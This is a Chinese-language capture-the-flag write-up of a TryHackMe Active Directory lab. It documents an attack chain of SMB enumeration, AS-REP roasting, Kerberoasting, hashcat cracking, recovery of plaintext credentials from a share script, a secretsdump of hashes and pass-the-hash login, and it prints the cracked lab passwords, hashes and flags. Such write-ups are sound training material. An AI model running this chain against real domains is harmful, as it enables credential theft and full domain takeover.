TryHackMe-VulnNet: Roasted
2023-02-19 12:19:42 时间
信息收集
nmap扫描发现开放了DNS、kerberos等服务,并且发现存在域名:vulnnet-rst.local
nmap -sV -sC -Pn 10.10.107.74枚举SMB共享
对于Windows机器来说,我们一般从枚举 SMB 共享(445端口)开始,可能会得到一些存储在共享中的凭据,而常用的枚举工具有crackmapexec、smbclient和smbmap,这里我们使用smbmap枚举SMB共享,发现有3个分享文件夹是有读的权限
smbmap -H 10.10.107.74 -u anonymous由于 IPC$ 共享是可读的,我们可以利用impacket中的lookupsid脚本枚举有效的域用户
python lookupsid.py anonymous@10.10.107.74 | tee usernames
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.107.74
[*] StringBinding ncacn_np:10.10.107.74[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)然后我们再从此输出中提取所有用户
cat usernames | grep SidTypeUser |gawk -F '\' '{ print $2 }' |gawk -F ' ' '{ print $1 }' |tee usernames
Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leetAS-REP Roasting
当用户帐户设置了”不需要预身份验证"权限时,就会发生AS-REP Roasting。这意味着该帐户在向指定用户帐户请求Kerberos票证之前不需要提供有效身份证明。所以我们可以利用impacket中的GetNPUsers脚本,发现只有t-skid可以在不需要提供密码的情况下请求票证
python GetNPUsers.py -no-pass -usersfile /root/users.txt -dc-ip 10.10.107.74 vulnnet-rst.local/
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:31be8bf9464ca217547bf2206268d10e$57402956b1951d7944c587f4dc16c68251d800bac7b8a8e0718fbf3079f0efad1db3c2732ef94cc1fbeac2b59e47e70e28f65e1cd5bbb7665f1d06250ed7d00ab1f721d01cf48827f8f9a6f5e09c59623ab44debc007023299ce86056e4f8e5ea81eaf7af40e0cdd34bbf837af7a4e7814199fd94f582da53c21391db47d6a8398cb573fe2771978001da2173cd325ea8df82fb1899ad799d283edcb3a31bff4f7f605fdf8388865217e270132eeceabd90b194886621155ed118b4920c6a4ff0aa70b0c59d81fd99753aa2ab1cd74753fef4be6d3ea6925dbb1157f7bee5150bc9280cf174db2d0cfcc353710f8133873bdcb631458hashcat爆破一下得到密码:tj072889*
hashcat -m 18200 /root/hash.txt /usr/share/wordlists/rockyou.txt使用t-skid的凭证执行Kerberoasting
因为我们现在有了一个有效的凭证,所以我们可以执行kerberoasting来获取用于在Microsoft Windows中识别服务帐户的域服务主体名称 (SPN) 的 KRB5 TGS hash
python GetUserSPNs.py -dc-ip 10.10.107.74 'vulnnet-rst.local/t-skid:tj072889*' -outputfile kerberoasting_hashes.txthashcat爆破一下得到密码:ry=ibfkfv,s6h,
hashcat -m 13100 kerberoasting_hashes.txt /usr/share/wordlists/rockyou.txt然后通过evil-winrm登录enterprise-core-vn用户来得到flag1:THM{726b7c0baaac1455d05c827b5561f4ed}(卡炸了后面出门机器时间到了没续上?,直接开了今天的AttackBox会好一些
evil-winrm -i 10.10.29.162 -u enterprise-core-vn -p 'ry=ibfkfv,s6h,'提权
通过enterprise-core-vn用户的凭据读取NETLOGON和SYSVOL smb共享
crackmapexec smb 10.10.29.162 --shares -u enterprise-core-vn -p 'ry=ibfkfv,s6h,'
SMB 10.10.29.162 445 WIN-2BO8M1OE1M1 [*] Windows 10.0 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:False)
SMB 10.10.29.162 445 WIN-2BO8M1OE1M1 [+] vulnnet-rst.local\enterprise-core-vn:ry=ibfkfv,s6h,
SMB 10.10.29.162 445 WIN-2BO8M1OE1M1 [+] Enumerated shares
SMB 10.10.29.162 445 WIN-2BO8M1OE1M1 Share Permissions Remark
SMB 10.10.29.162 445 WIN-2BO8M1OE1M1 ----- ----------- ------
SMB 10.10.29.162 445 WIN-2BO8M1OE1M1 ADMIN$ Remote Admin
SMB 10.10.29.162 445 WIN-2BO8M1OE1M1 C$ Default share
SMB 10.10.29.162 445 WIN-2BO8M1OE1M1 IPC$ READ Remote IPC
SMB 10.10.29.162 445 WIN-2BO8M1OE1M1 NETLOGON READ Logon server share
SMB 10.10.29.162 445 WIN-2BO8M1OE1M1 SYSVOL READ Logon server share
SMB 10.10.29.162 445 WIN-2BO8M1OE1M1 VulnNet-Business-Anonymous READ VulnNet Business Sharing
SMB 10.10.29.162 445 WIN-2BO8M1OE1M1 VulnNet-Enterprise-Anonymous READ VulnNet Enterprise Sharing 使用enterprise-core-vn用户的凭据再次枚举smb共享,发现了一个vbs文件,查看得到账号密码:a-whitehat/bNdKVkjv3RR9ht
smbclient -U enterprise-core-vn //10.10.29.162/NETLOGON这里登录的时候曾连上了一小会然后突然就断开一直连不上了?然后又关掉重开了一下换kali接着试试看
evil-winrm -i 10.10.29.162 -u 'a-whitehat' -p 'bNdKVkjv3RR9ht'因为这里a-whithat用户是域管理员,我们可以执行DCSync攻击从而获取管理员的hash并通过EvilWinRM登录
利用impacket中的secretsdump脚本获取hash
python secretsdump.py vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@10.10.29.162
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)接着登录管理员用户得到flag2:THM{16f45e3934293a57645f8d7bf71d8d4c}
evil-winrm -i 10.10.29.162 -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d结束撒花?
相关文章
- 同步中的四种锁synchronized、ReentrantLock、ReentrantReadWriteLock、StampedLock
- 根据CPU核心数确定线程池并发线程数
- 分布式共识算法 (二) Paxos算法
- secureCRT关闭连接自动关闭tomcat服务
- apache的MultipartEntityBuilder文件上传
- JDK8-废弃永久代(PermGen)迎来元空间(Metaspace)
- jdk源码剖析四:JDK1.7升级1.8 HashMap原理的变化
- jdk源码剖析二: 对象内存布局、synchronized终极原理
- jdk源码剖析一:OpenJDK-Hotspot源码包目录结构
- JDK8-十大新特性-附demo
- 设置火狐新建标签页--终极方案,17年最火狐亲自测试可行!
- jdk源码剖析三:锁Synchronized
- 分布式共识算法 (三) Raft算法
- mysql事务隔离级别和MVCC
- zookeeper分布式锁
- JDK1.8导致发送邮件失败
- RSA加密
- 基于Redis的爬虫平台的实现
- jar包目录下MANIFEST.MF标准格式
- maven常用插件pom配置